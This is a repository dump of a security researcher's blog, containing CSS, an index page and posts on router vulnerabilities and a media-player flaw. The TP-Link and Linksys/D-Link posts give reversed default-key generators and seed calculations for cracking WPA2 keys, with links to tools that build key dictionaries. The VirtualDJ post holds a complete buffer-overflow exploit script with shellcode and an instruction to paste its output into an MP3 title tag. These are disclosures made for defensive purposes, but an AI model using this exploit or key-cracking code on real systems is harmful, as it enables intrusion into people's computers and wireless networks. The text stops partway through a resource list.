vertical-align: top; 793 | } 794 | 795 | .markdown-body .blob-code-inner { 796 | color: #24292e; 797 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 798 | font-size: 12px; 799 | overflow: visible; 800 | white-space: pre; 801 | word-wrap: normal; 802 | } 803 | 804 | .markdown-body .pl-token.active, 805 | .markdown-body .pl-token:hover { 806 | background: #ffea7f; 807 | cursor: pointer; 808 | } 809 | 810 | .markdown-body kbd { 811 | background-color: #fafbfc; 812 | border: 1px solid #d1d5da; 813 | border-bottom-color: #c6cbd1; 814 | border-radius: 3px; 815 | box-shadow: inset 0 -1px 0 #c6cbd1; 816 | color: #444d56; 817 | display: inline-block; 818 | font: 11px SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 819 | line-height: 10px; 820 | padding: 3px 5px; 821 | vertical-align: middle; 822 | } 823 | 824 | .markdown-body :checked+.radio-label { 825 | border-color: #0366d6; 826 | position: relative; 827 | z-index: 1; 828 | } 829 | 830 | .markdown-body .tab-size[data-tab-size="1"] { 831 | -moz-tab-size: 1; 832 | tab-size: 1; 833 | } 834 | 835 | .markdown-body .tab-size[data-tab-size="2"] { 836 | -moz-tab-size: 2; 837 | tab-size: 2; 838 | } 839 | 840 | .markdown-body .tab-size[data-tab-size="3"] { 841 | -moz-tab-size: 3; 842 | tab-size: 3; 843 | } 844 | 845 | .markdown-body .tab-size[data-tab-size="4"] { 846 | -moz-tab-size: 4; 847 | tab-size: 4; 848 | } 849 | 850 | .markdown-body .tab-size[data-tab-size="5"] { 851 | -moz-tab-size: 5; 852 | tab-size: 5; 853 | } 854 | 855 | .markdown-body .tab-size[data-tab-size="6"] { 856 | -moz-tab-size: 6; 857 | tab-size: 6; 858 | } 859 | 860 | .markdown-body .tab-size[data-tab-size="7"] { 861 | -moz-tab-size: 7; 862 | tab-size: 7; 863 | } 864 | 865 | .markdown-body .tab-size[data-tab-size="8"] { 866 | -moz-tab-size: 8; 867 | tab-size: 8; 868 | } 869 | 870 | .markdown-body .tab-size[data-tab-size="9"] { 871 | -moz-tab-size: 9; 872 | tab-size: 9; 873 | } 874 | 875 | .markdown-body .tab-size[data-tab-size="10"] { 876 | -moz-tab-size: 10; 877 | tab-size: 10; 878 | } 879 | 880 | .markdown-body .tab-size[data-tab-size="11"] { 881 | -moz-tab-size: 11; 882 | tab-size: 11; 883 | } 884 | 885 | .markdown-body .tab-size[data-tab-size="12"] { 886 | -moz-tab-size: 12; 887 | tab-size: 12; 888 | } 889 | 890 | .markdown-body .task-list-item { 891 | list-style-type: none; 892 | } 893 | 894 | .markdown-body .task-list-item+.task-list-item { 895 | margin-top: 3px; 896 | } 897 | 898 | .markdown-body .task-list-item input { 899 | margin: 0 .2em .25em -1.6em; 900 | vertical-align: middle; 901 | } 902 | 903 | .markdown-body hr { 904 | border-bottom-color: #eee; 905 | } 906 | 907 | .markdown-body .pl-0 { 908 | padding-left: 0!important; 909 | } 910 | 911 | .markdown-body .pl-1 { 912 | padding-left: 4px!important; 913 | } 914 | 915 | .markdown-body .pl-2 { 916 | padding-left: 8px!important; 917 | } 918 | 919 | .markdown-body .pl-3 { 920 | padding-left: 16px!important; 921 | } 922 | 923 | .markdown-body .pl-4 { 924 | padding-left: 24px!important; 925 | } 926 | 927 | .markdown-body .pl-5 { 928 | padding-left: 32px!important; 929 | } 930 | 931 | .markdown-body .pl-6 { 932 | padding-left: 40px!important; 933 | } 934 | 935 | .markdown-body .pl-7 { 936 | padding-left: 48px!important; 937 | } 938 | 939 | .markdown-body .pl-8 { 940 | padding-left: 64px!important; 941 | } 942 | 943 | .markdown-body .pl-9 { 944 | padding-left: 80px!important; 945 | } 946 | 947 | .markdown-body .pl-10 { 948 | padding-left: 96px!important; 949 | } 950 | 951 | .markdown-body .pl-11 { 952 | padding-left: 112px!important; 953 | } 954 | 955 | .markdown-body .pl-12 { 956 | padding-left: 128px!important; 957 | } 958 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Blog 8 | 9 | 10 | 11 | 38 | 39 | 40 |
41 | 48 |

Blog

49 |
50 |
51 |
DateArticle
2019-02-16PS3/Cell Cryptomining: Wide arithmetic on SPUs
2018-04-18LLE vs HLE and their tradeoffs
2017-06-19GoogleCTF 2017 Reversing/Moon writeup
2016-10-12Solutions of xchg rax,rax
2016-09-07Fast lookups in JIT-compiled maps
2016-08-22Observations
2016-03-16PS3 GPU Full VRAM/IO access exploit
2013-04-20VirtualDJ Pro/Home 7.4: Buffer Overflow
2013-03-31WPA2 Key Generation Vulnerability: Linksys / D-Link
2013-03-30VirtualDJ Pro/Home 7.3: Buffer Overflow
2013-03-08WPA2 Key Generation Vulnerability: TP-Link
52 |
53 |
54 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /posts/2013-03-08-wpa2-vulnerability-tplink/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-03-08 4 | title: WPA2 Key Generation Vulnerability: TP-Link 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | These days I have been playing with my new WLAN router, a [TP-Link TD-W8970](http://www.tp-link.com/en/products/?categoryid=203), and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key `TP-LINK_XXXXXX`. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range `[0-9A-Z]` and randomly generated by the [EasySetupAssistant](http://www.tp-link.com/mx/support/download/?model=TD-W8970&version=V1#tbl_b). 9 | 10 | Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a [linear congruential generator](http://en.wikipedia.org/wiki/Linear_congruential_generator) reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is: 11 | 12 | ```python 13 | chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ" 14 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP 15 | key = "" 16 | for i in range(length): 17 | seed = (seed * 0x343FD) + 0x269EC3 18 | key += chars[((seed >> 0x10) & 0x7FFF) % 0x28] 19 | return key 20 | ``` 21 | 22 | Furthermore, note how the for any `length` and 32-bit integer seed `k` following condition holds: `gen(k, length) == gen(k + 0x80000000, length)`. This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 231 / 20000 seconds = 1.24 days. 23 | 24 | There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure [PRNG](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via `GetSystemTimeAsFileTime` from `Kernel32.dll`. The corresponding code to generate a seed at a given moment is: 25 | 26 | ```python 27 | import datetime 28 | 29 | def genSeed(currentTime): 30 | dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0) 31 | t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10 32 | 33 | tA = (t / 2**32 + 0xFE624E21) 34 | tB = (t % 2**32 + 0x2AC18000) % (1 << 32) 35 | 36 | if tA >= (1 << 32): 37 | tA += 1 38 | tA %= (1 << 32) 39 | 40 | r = (tA % 0x989680) * (2**32) 41 | r = ((r + tB) / 0x989680) % (2**32) 42 | return r 43 | 44 | print genSeed(datetime.datetime.utcnow()) 45 | ``` 46 | 47 | If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between `0x4EFFA3AD` y `0x50E22700`: 48 | 49 | ```python 50 | genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0)) # 0x4EFFA3AD 51 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0)) # 0x50E22700 52 | ``` 53 | 54 | At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes. 55 | 56 | Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways: 57 | 58 | * Detecting the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market. 59 | * Discard any seeds corresponding to *strange* hours. For instance, it is pretty unlikely someone sets up their router at 2 AM and 6 AM. 60 | 61 | ## Affected routers 62 | 63 | I have verified all setup assistants distributed with TP-Link routers and all *TL-WA*, *TL-WR*, *TL-WDR* series and *TD-WXXXX*, *TD-VGXXXX* models are affected. In about 10% of these routers I wasn't able to download the *EasySetupAssistant* through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them. 64 | 65 | The complete list of affected routers is: 66 | 67 | * TL-W8151N (V1, V3) 68 | * TL-WA730RE (V1, V2*) 69 | * TL-WA830RE (V1, V2*) 70 | * TL-WDR3500 71 | * TL-WDR3600 72 | * TL-WDR4300 73 | * TL-WR720N 74 | * TL-WR740N (V1, V2, V3, V4) 75 | * TL-WR741ND (V1, V2, V3*, V4) 76 | * TL-WR841N (V1*, V5, V7, V8) 77 | * TL-WR841ND (V3, V5, V7, V8*) 78 | * TL-WR842ND 79 | * TL-WR940N (V1, V2) 80 | * TL-WR941ND (V2, V3, V4, V5) 81 | * TL-WR1043N 82 | * TL-WR1043ND 83 | * TD-VG3511 (V1*) 84 | * TD-VG3631 85 | * TD-W8901N 86 | * TD-W8950ND 87 | * TD-W8951NB (V3*, V4, V5) 88 | * TD-W8951ND (V1, V3, V4, V5) 89 | * TD-W8960N (V1, V3, V4) 90 | * TD-W8961NB (V1, V2, V3*) 91 | * TD-W8961ND 92 | * TD-W8968 93 | * TD-W8970 94 | 95 | ## Resources 96 | 97 | * __TPLink-CheckKeys__: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a. 98 | 99 | * __TPLink-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8. 100 | 101 | * __TPLink-GenKeys__: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in `./output.txt`. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68. 102 | 103 | ## Solutions 104 | 105 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/random` or `/dev/urandom` in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`. 106 | * If for some reason you want to use seeds for generating keys: 107 | * Make them bigger than 32-bit. Just 2^32 keys are easy to check. 108 | * Obtain them from a cryptographically secure PRNG. 109 | * If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. 110 | -------------------------------------------------------------------------------- /posts/2013-03-08-wpa2-vulnerability-tplink/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | WPA2 Key Generation Vulnerability: TP-Link 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

WPA2 Key Generation Vulnerability: TP-Link

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-03-08 72 |

73 |

These days I have been playing with my new WLAN router, a TP-Link TD-W8970, and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key TP-LINK_XXXXXX. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range [0-9A-Z] and randomly generated by the EasySetupAssistant.

74 |

Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a linear congruential generator reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:

75 |
chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"
 76 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP 
 77 |     key = ""
 78 |     for i in range(length):
 79 |         seed = (seed * 0x343FD) + 0x269EC3
 80 |         key += chars[((seed >> 0x10) & 0x7FFF) % 0x28]
 81 |     return key
 82 | 
83 | 84 | 85 |

Furthermore, note how the for any length and 32-bit integer seed k following condition holds: gen(k, length) == gen(k + 0x80000000, length). This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 231 / 20000 seconds = 1.24 days.

86 |

There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure PRNG. Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via GetSystemTimeAsFileTime from Kernel32.dll. The corresponding code to generate a seed at a given moment is:

87 |
import datetime
 88 | 
 89 | def genSeed(currentTime):
 90 |     dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0)
 91 |     t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
 92 | 
 93 |     tA = (t / 2**32 + 0xFE624E21)
 94 |     tB = (t % 2**32 + 0x2AC18000) % (1 << 32)
 95 | 
 96 |     if tA >= (1 << 32):
 97 |         tA += 1
 98 |         tA %= (1 << 32)
 99 | 
100 |     r = (tA % 0x989680) * (2**32)
101 |     r = ((r + tB) / 0x989680) % (2**32)
102 |     return r
103 | 
104 | print genSeed(datetime.datetime.utcnow())
105 | 
106 | 107 | 108 |

If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between 0x4EFFA3AD y 0x50E22700:

109 |
genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0))  # 0x4EFFA3AD
110 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0))  # 0x50E22700
111 | 
112 | 113 | 114 |

At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.

115 |

Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:

116 | 120 |

Affected routers

121 |

I have verified all setup assistants distributed with TP-Link routers and all TL-WA, TL-WR, TL-WDR series and TD-WXXXX, TD-VGXXXX models are affected. In about 10% of these routers I wasn't able to download the EasySetupAssistant through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.

122 |

The complete list of affected routers is:

123 | 152 |

Resources

153 | 164 |

Solutions

165 | 172 |
173 |
174 | 180 | 181 | 182 | -------------------------------------------------------------------------------- /posts/2013-03-30-virtualdj-73-buffer-overflow/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-03-30 4 | title: VirtualDJ Pro/Home 7.3: Buffer Overflow 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.3 and VirtualDJ Home 7.3](http://www.virtualdj.com/) and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as _Title_, _Album_, and _Artist_ and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters `[A-Z]` from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the `retn` instruction, the `edi` register points to the first buffer. 9 | 10 | We cannot assign the `eip` the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title `"FSFD"`. After the buffer overflows occurs we get `eip == 0×44465346 == "FSFD"`. At this address (inside _urlmon.dll_) we find a `call edi` instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (`retn`) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. Let me explain: 11 | 12 | Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string `"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"`: 13 | 14 | ```asm 15 | and eax, 40404040h ; 25 40 40 40 40 == "%@@@@" 16 | and eax, 3F3F3F3Fh ; 25 3F 3F 3F 3F == "%????" <– eax == 0 17 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@" 18 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@" 19 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@" 20 | sub eax, 3F433F52h ; 2D 3F 43 3F 52 == "-R?C?" <– eax == 0xFFEFFFB8 21 | push eax ; 50 == "P" 22 | ``` 23 | 24 | Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use `push esp` (0×54) and `retn` (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one. 25 | 26 | This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread quickly a malware just by uploading a malicious MP3 file in a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces. 27 | 28 | ```python 29 | #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability 30 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 31 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0 32 | 33 | import string 34 | 35 | def unicodeHex(c): 36 | c = hex(ord(c))[2:].upper() 37 | if len(c)==1: c = "0"+c 38 | return c+"00" 39 | 40 | def movEAX(s): 41 | #Arrays 42 | s = map(ord, list(s)) 43 | inst = [] 44 | target = [512, 512, 512, 512] 45 | carry = [0,-2,-2,-2] 46 | for i in range(4): 47 | if s[i] < 0x10: 48 | target[i] = 256 49 | if i < 3: 50 | carry[i+1] = -1 51 | diff = [target[b] - s[b] for b in range(4)] 52 | 53 | #Gen instructions 54 | for i in range(3): 55 | target = [target[b] - diff[b]/4 for b in range(4)] 56 | inst += [[diff[b]/4 for b in range(4)]] 57 | target = [target[b] - s[b] + carry[b] for b in range(4)] 58 | inst += [target] 59 | 60 | #Remove characters '[','\',']' 61 | for b in range(4): 62 | if ord("[") in [inst[i][b] for i in range(4)] or \ 63 | ord("\\") in [inst[i][b] for i in range(4)] or \ 64 | ord("]") in [inst[i][b] for i in range(4)]: 65 | for i in range(4): 66 | inst[i][b] = inst[i][b] + 5*((-1)**(i)) 67 | 68 | inst = ["\x2D" + "".join(map(chr, i)) for i in inst] 69 | return "".join(inst) 70 | 71 | #Shellcode: Run cmd.exe 72 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" 73 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" 74 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" 75 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" 76 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" 77 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 78 | shellcode += retAddress 79 | 80 | while len(shellcode) % 4 != 0: 81 | shellcode += '\x90' 82 | exploit = "" 83 | for i in range(0,len(shellcode),4)[::-1]: 84 | exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F" #EAX = 0 85 | exploit += movEAX(shellcode[i:i+4]) #EAX = shellcode[i:i+4] 86 | exploit += "\x50" #PUSH EAX 87 | exploit += '\x54\xC3' #PUSH ESP; RETN 88 | 89 | c = 0 90 | for i in exploit: 91 | if i in string.ascii_letters: 92 | c += 1 93 | exploit += "A" * (4100 - c) 94 | exploit += "FSFD" 95 | 96 | print exploit 97 | #Paste the generated code in the tag 'Title' of the MP3 file. 98 | ``` 99 | 100 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0. 101 | 102 | ## Log 103 | 104 | * __2012-11-29__: Bug discovered. VirtualDJ was emailed about this a few days later. 105 | * __2013-03-20__: Bug fixed with the release of VirtualDJ Pro/Home 7.4. 106 | * __2013-03-29__: Exploit published. 107 | -------------------------------------------------------------------------------- /posts/2013-03-30-virtualdj-73-buffer-overflow/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | VirtualDJ Pro/Home 7.3: Buffer Overflow 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

VirtualDJ Pro/Home 7.3: Buffer Overflow

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-03-30 72 |

73 |

I have found a buffer overflow vulnerability in VirtualDJ Pro 7.3 and VirtualDJ Home 7.3 and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as Title, Album, and Artist and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters [A-Z] from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the retn instruction, the edi register points to the first buffer.

74 |

We cannot assign the eip the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title "FSFD". After the buffer overflows occurs we get eip == 0×44465346 == "FSFD". At this address (inside urlmon.dll) we find a call edi instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (retn) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. Let me explain:

75 |

Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string "%@@@@%????-R@D@-R@D@-R@D@-R?C?P":

76 |
and   eax, 40404040h   ; 25 40 40 40 40  == "%@@@@"
 77 | and   eax, 3F3F3F3Fh   ; 25 3F 3F 3F 3F  == "%????"  <– eax == 0
 78 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 79 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 80 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 81 | sub   eax, 3F433F52h   ; 2D 3F 43 3F 52  == "-R?C?"  <– eax == 0xFFEFFFB8
 82 | push  eax              ; 50              == "P"
 83 | 
84 | 85 | 86 |

Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use push esp (0×54) and retn (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one.

87 |

This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread quickly a malware just by uploading a malicious MP3 file in a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.

88 |
#Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability 
 89 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
 90 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0
 91 | 
 92 | import string
 93 | 
 94 | def unicodeHex(c):
 95 |     c = hex(ord(c))[2:].upper()
 96 |     if len(c)==1: c = "0"+c
 97 |     return c+"00"
 98 | 
 99 | def movEAX(s):
100 |     #Arrays 
101 |     s = map(ord, list(s))
102 |     inst = []
103 |     target = [512, 512, 512, 512]
104 |     carry  = [0,-2,-2,-2]
105 |     for i in range(4):
106 |         if s[i] < 0x10:
107 |             target[i] = 256
108 |             if i < 3:
109 |                 carry[i+1] = -1
110 |     diff = [target[b] - s[b] for b in range(4)]
111 | 
112 |     #Gen instructions 
113 |     for i in range(3):
114 |         target = [target[b] - diff[b]/4 for b in range(4)]
115 |         inst += [[diff[b]/4 for b in range(4)]]
116 |     target = [target[b] - s[b] + carry[b] for b in range(4)]
117 |     inst += [target]
118 | 
119 |     #Remove characters '[','\',']' 
120 |     for b in range(4):
121 |         if ord("[")  in [inst[i][b] for i in range(4)] or \
122 |            ord("\\") in [inst[i][b] for i in range(4)] or \
123 |            ord("]")  in [inst[i][b] for i in range(4)]:
124 |             for i in range(4):
125 |                 inst[i][b] = inst[i][b] + 5*((-1)**(i))
126 | 
127 |     inst  = ["\x2D" + "".join(map(chr, i)) for i in inst]
128 |     return "".join(inst)
129 | 
130 | #Shellcode: Run cmd.exe 
131 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
132 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
133 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
134 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
135 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
136 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 
137 | shellcode += retAddress
138 | 
139 | while len(shellcode) % 4 != 0:
140 |     shellcode += '\x90'
141 | exploit = ""
142 | for i in range(0,len(shellcode),4)[::-1]:
143 |     exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F"  #EAX = 0 
144 |     exploit += movEAX(shellcode[i:i+4])  #EAX = shellcode[i:i+4] 
145 |     exploit += "\x50"  #PUSH EAX 
146 | exploit += '\x54\xC3' #PUSH ESP; RETN 
147 | 
148 | c = 0
149 | for i in exploit:
150 |     if i in string.ascii_letters:
151 |         c += 1
152 | exploit +=  "A" * (4100 - c)
153 | exploit += "FSFD"
154 | 
155 | print exploit
156 | #Paste the generated code in the tag 'Title' of the MP3 file.
157 | 
158 | 159 | 160 |

You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.

161 |

Log

162 | 167 |
168 |
169 | 175 | 176 | 177 | -------------------------------------------------------------------------------- /posts/2013-03-31-wpa2-vulnerability-linksys-dlink/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-03-31 4 | title: WPA2 Key Generation Vulnerability: Linksys / D-Link 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | After finding the [TP-Link WPA2 Key Generation Vulnerability](../2013-03-08-wpa2-vulnerability-tplink/), I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers user nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here. 9 | 10 | This time, the vulnerability affects the **Linksys EasyLink Advisor** and **D-Link Quick Setup Wizard** assistants, both based in *Network Magic*, a software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants. 11 | 12 | The reversed generator is: 13 | 14 | ```python 15 | blacklist_windows = "1I2Z0O5SUV" 16 | blacklist_macosx = "B8DO0I1S5UVZ2" 17 | blacklist = blacklist_windows # Change me 18 | 19 | def gen(seed): 20 | key = "" 21 | for i in range(10): 22 | while True: 23 | seed = ((seed * 0x343FD) + 0x269EC3) % (2**32) 24 | edx = ((seed >> 0x10) & 0x7FFF) % 0x24 25 | if edx >= 0xA: 26 | edx += 0x37 27 | else: 28 | edx += 0x30 29 | if chr(edx) not in blacklist: 30 | key += chr(edx) 31 | break 32 | return key 33 | ``` 34 | 35 | The seeds used by this function are obtained in the exactly same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a *whitelist*, it adds random characters in range `[0-9A-Z]`, filtering out those found in a hardcoded *blacklist*, meant to prevent adding visually similar characters such as '`0`' and '`O`' to the key. 36 | 37 | As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU. 38 | 39 | 40 | ## Affected routers 41 | 42 | The complete list of affected Linksys routers is: 43 | 44 | * WAP610N (Blacklisted characters on Windows assistant: `"1I2Z0O5SUVB8"`) 45 | * WRT110 46 | * WRT120N 47 | * WRT160N (V1, V2, V3) 48 | * WRT160N-HP (V1*) 49 | * WRT160NL 50 | * WRT310N (V1, V2) 51 | * WRT320N 52 | * WRT400N 53 | * WRT54G2 54 | * WRT610N (V1*, V2) 55 | 56 | The complete list of affected D-Link routers is: 57 | 58 | * DGL-4100 59 | * DGL-4300 60 | * DIR-615 (not all revisions) 61 | * DIR-625 62 | * DIR-635 63 | * WBR-1310 64 | * WBR-1310 Rev. B 65 | * WBR-2310 66 | 67 | 68 | ## Resources 69 | 70 | * __Linksys-CheckKeys__: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: [http://www.mediafire.com/download.php?pmqt9aykwxhwkto](http://www.mediafire.com/download.php?pmqt9aykwxhwkto). 71 | * __Linksys-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: [http://www.mediafire.com/download.php?kpe7844kqd9bk4j](http://www.mediafire.com/download.php?kpe7844kqd9bk4j). 72 | * __Linksys-GenKeys__: Generate a key dictionary by specifying a seed interval. Download: 